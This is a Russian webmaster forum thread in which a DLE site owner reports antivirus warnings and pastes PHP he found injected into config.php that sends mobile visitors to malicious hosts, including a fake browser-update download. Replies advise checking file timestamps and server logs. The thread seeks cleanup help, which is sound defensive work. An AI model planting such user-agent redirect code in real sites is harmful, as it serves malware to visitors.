- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Здравствуйте!
Со вчерашнего дня при заходе на сайты (cms всех сайтов dle от 9.3 до 9.7) с помощью браузера opera, KIS 2013 выводит предупреждение (скриншот http://smotr.im/awTn). На других сайтах на этом хостинге та же проблема. В браузера google chrome такой проблемы не замечено. Отписал саппорту касперского и получил ответ "...statuses.ws/googleanalisys.js - является мобильным зловредом". По сайту пошерстил и подозрительных новых файлов не обнаружил.
На одном сайте в config.php внизу нашел код:
if ($android === true) {
header('Location: http://file07.com/browser_update/215/browser_update')
}
После его удаления АВП так и продолжает реагировать.
Если кто сталкивался прошу подсказать.
урл покажите. или statuses.ws?
p.s. могу помочь очистить.
урл покажите. или statuses.ws?
p.s. могу помочь очистить.
к примеру один из сайтов realdiz.ru
Тема закрыта, kgtu5 - помог с проблемой.
Может напишите здесь где копать данную строку для удаления?
файл dle_js.js
спасибо, а неподскажите как искать такого рода вирусы? просто до этого как то привык шерстить исходный код т.к в нём отображается всё. и обычно этого хватало, а так я бы врятли когда нашёл, проверил всякими онлайн антивирусами - бестолку. только каспер палил, но он не показывал всю цепочку до файла.
Сегодня нашел в config.php
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
как лезут незнаю...
Смотрите логи доступа и php.
смотри дату и время изменения файла, потом в access.log и error.log искать использованный запрос...
Сегодня нашел в config.php
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
как лезут незнаю...
ТС, вам вроде уже лечил kgtu5 не вылечил?
Тема закрыта, kgtu5 - помог с проблемой.
Я так понимаю он вам просто убрал причину, но не источник.